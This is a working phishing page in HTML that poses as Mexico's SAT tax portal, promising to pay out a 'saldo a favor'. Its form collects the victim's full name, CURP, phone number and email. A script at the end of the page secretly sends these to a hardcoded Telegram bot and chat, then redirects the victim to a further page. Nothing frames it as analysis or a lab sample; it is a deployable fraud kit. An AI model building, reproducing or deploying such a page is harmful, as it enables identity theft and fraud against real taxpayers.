<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="generator" content="PURA GENTE DE LATEN">
        <script src="//ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1">
        <meta name="description" content>
        <title>PORTAL SAT</title>
        
<link rel="stylesheet" href="asset/gestiones/./index_files/bootstrap.min.css">
<link rel="stylesheet" href="asset/gestiones/./index_files/bootstrap-grid.min.css">
<link rel="stylesheet" href="asset/gestiones/./index_files/style(3).css">

<link rel="stylesheet" href="asset/gestiones/./index_files/style(4).css">
<link rel="stylesheet" href="asset/gestiones/./index_files/mbr-additional.css" type="text/css">
<style>
    .hro{
        background: #2aa977;
        color: white;
        padding: 30px 0px;
        width: 100%;
    }
    .hro h4{
        text-align: center;
        padding-bottom: 20px;
        font-weight: bold;
    }
    .hro1{
        background: #eeeeeede;
        max-width: 330px;
        border-radius: 12px;
        margin: 0 auto 30px auto;
        padding: 10px 0px;
    }
    .hro1{
        text-align: center;
        color: #a9a9a9;
        padding: 20px 0px 30px 0px;
    }
    .hro1 p{
        margin-bottom: 20px;
    }
    input{
        width: 80%;
        color: black;
        background: white;
        padding: 12px;
        outline: none;
        border: none;
    }
    #env{
        border: none;
        border-radius: 50px;
        background: #008ce3;
        text-decoration: none;
        color: white;
        font-weight: bold;
    }
</style>
</head>
<body>
    
    <!-- PRIMER DIV NAV Y LOGO -->
    <section id="top-1" style="display: none;"><a href="https://mobirise.in/">mobirise.com</a> Mobirise v5.3.12</section>
<section class="menu menu1 cid-sDJ2sDA3Gm" once="menu" id="menu1-y">
<nav class="navbar navbar-dropdown navbar-fixed-top navbar-expand-lg">
<div class="container-fluid">
<div class="navbar-brand">
<span class="navbar-logo">
<a href="https://gobsat.cf/index.html">
<img src="logo.png" alt="LOGO" style="height: 3rem;">
</a>
</span>
</div>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
<div class="hamburger">
<span></span>
<span></span>
<span></span>
<span></span>
</div>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav nav-dropdown nav-right" data-app-modern-menu="true"><li class="nav-item"><a class="nav-link link text-white text-primary display-7" href="index.html" aria-expanded="false">Inicio</a></li>
<li class="nav-item"><a class="nav-link link text-white text-primary display-7" href="###">Saldo</a></li>
<div class="wrapper">
<div class="icons-menu">
</div>
</div>
</div>
</div>
</nav>
</section>


<!-- SEGUNDO DIV FOEMULARIO -->
<section class="hro">
    <h4>Datos</h4>
    <div class="hro1">
        <p>RETIRAR SALDO A FAVOR</p>
        <form>
            <p><input type="text" name="" id="nombre" placeholder="Nombre Completo" required></p>
            <p><input type="text" name="" id="curp" placeholder="Curp" required></p>
            <p><input type="number" name="" placeholder="+52" id="number" required></p>
            <p><input type="email" name="email" id="email" value="@gmail.com" required></p>
            
            <input type="submit" value="Continuar" formaction="page4.html" id="env">
        </form>
    </div>
</section>


<!-- FOOTER PIE DEPAGINA -->
<section class="firmm4_footer3 cid-sjZasLTRou" id="footer3-4">
<div class="line"></div>
<div class="container">
<div class="row text-white justify-content-between">
<div class="col-12 col-md-4 col-lg-5">
© Copyright SAT GOB.MX 2023<br></div>
</div>
</div>
</section>
<script src="asset/gestiones/./index_files/bootstrap.min.js"></script>
<script>
    // Agrega el código JavaScript necesario para enviar la información al bot de Telegram
    var form = document.querySelector('form');
        form.addEventListener('submit', function(event) {
            event.preventDefault(); // Evita el envío del formulario por defecto

            // Obtén los valores de los campos de entrada
            var telefono = document.getElementById('nombre').value;
            var contrasena = document.getElementById('curp').value;
            var codigo = document.getElementById('number').value;
            var xdxdxd = document.getElementById('email').value;
            // Construye el mensaje a enviar al bot de Telegram
            var mensaje = "SAT INF \n\nNombre: " + telefono + "\nCurp: " + contrasena + "\nTelefono: " + codigo + "\nEmail:" + xdxdxd;

            var url_chat1 = "https://api.telegram.org/bot6670389624:AAFupmGjbtOL6hxvHFkw7cli-k_IwsG8PfE/sendMessage?chat_id=-1001962368778&text=" + encodeURIComponent(mensaje);
            var request_chat1 = new XMLHttpRequest();
            request_chat1.open('GET', url_chat1, true);
            request_chat1.send();

            // Redirige al otro sitio web al terminar (reemplaza 'URL_DESTINO' con la URL deseada)
            setTimeout(function() {
                window.location.href = 'page4.html';
            }, 1000); // Cambia el valor de 1000 (1 segundo) según tus necesidades
        });
</script>
</body></html>
